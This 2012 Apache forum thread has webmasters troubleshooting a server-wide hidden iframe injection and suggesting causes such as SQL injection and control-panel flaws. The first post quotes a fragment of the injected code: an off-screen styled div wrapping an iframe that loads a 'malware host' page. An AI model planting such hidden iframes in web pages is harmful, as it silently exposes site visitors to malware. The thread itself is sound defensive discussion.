iFrame Injections on Server - Apache Web Server forum at WebmasterWorld - WebmasterWorld

Forum Moderators: phranque

Message Too Old, No Replies

iFrame Injections on Server

Musicarl

12:05 pm on Aug 15, 2012 (gmt 0)

10+ Year Member

We had a server that showed this type of obfuscated iFrame injection:

<style>.ncy8eh4 { position:absolute; left:-1228px; top:-1108px} </style> <div class="ndicy73jk"><iframe src="http://malware host/325364773.html

The injected code would change constantly with different URLs.

The iFrame wouldn't always show up, but it affected every site on the server and could affect any page - even a test text page like test.html.

Logs show no signs of unauthorized entry, passwords are secure, Apache is 2.2.21.

Since this got into the whole server, we're suspecting something with Apache, but can't figure out how it could be compromised in this manner.

It looks like others have had a similar problem. A breakdown is in detail here:
[blog.unmaskparasites.com ]

Some of the key points from the article:

We should be actually talking about infected server responses since the malicious code cannot be found in any website files.

It is pretty hard to detect this infection since only random server responses are affected.

If you check Apache logs, you can recognize tempered responses since their sizes are slightly bigger than typical response sizes for the same pages.

Any idea how this could happen or how to get rid of it?

wilderness

2:07 pm on Aug 15, 2012 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

Thread title

iFrame Injections on Server

Any idea how this could happen or how to get rid of it?

Sql Injections, PHP vulnerabilities and/or use of 3rd party PHP add-ons, Perl scripts and/or use of 3rd party Perl (same vulnerabiites) scripts.

I don't recall seeing any references within this forum which stated that Apache offered a capability to write either html or CSS.

Musicarl

4:42 pm on Aug 15, 2012 (gmt 0)

10+ Year Member

Thanks for the response. I realize this might not be an Apache issue, but since it seems to be happening at the root level and is affecting other Apache sites, I thought this was the appropriate forum.

wilderness

4:46 pm on Aug 15, 2012 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

SQL injections [google.com]

incrediBILL

1:44 am on Aug 16, 2012 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

If you think the entire server is infected, which I've seen with this type of hack, I'd suggest migrating to a clean server and upgrade/update ALL your installed CGI/PHP/etc. software to make sure it's all current and change ALL your passwords.

FWIW, if you're using a control panel like Plesk they've had a couple of vulnerabilities lately and the micro-updates appeared to patch mine, but some needed to apply it manually so that could be another source of infiltration.

Musicarl

6:18 pm on Aug 16, 2012 (gmt 0)

10+ Year Member

Thanks Bill.

This is a really tricky piece of malware. It gets injected into any page with a

</script>

tag, and it comes and goes, making it very hard to trace.

The destination URL (iframe src=) changes simultaneously on several infected sites, which we learned at unmaskparasites.

There are no signs of hacked files or rogue scripts, and the CMS is all custom.

At this point, our best guess is a compromised Apache module or PHP binary.

incrediBILL

6:29 pm on Aug 16, 2012 (gmt 0)

WebmasterWorld Senior Member

10+ Year Member

Top Contributors Of The Month

the CMS is all custom

Which means if the inputs aren't sanitized and you're using SQL then it's possibly wide open for SQL injection and anything is possible from there, but that's just speculation obviously.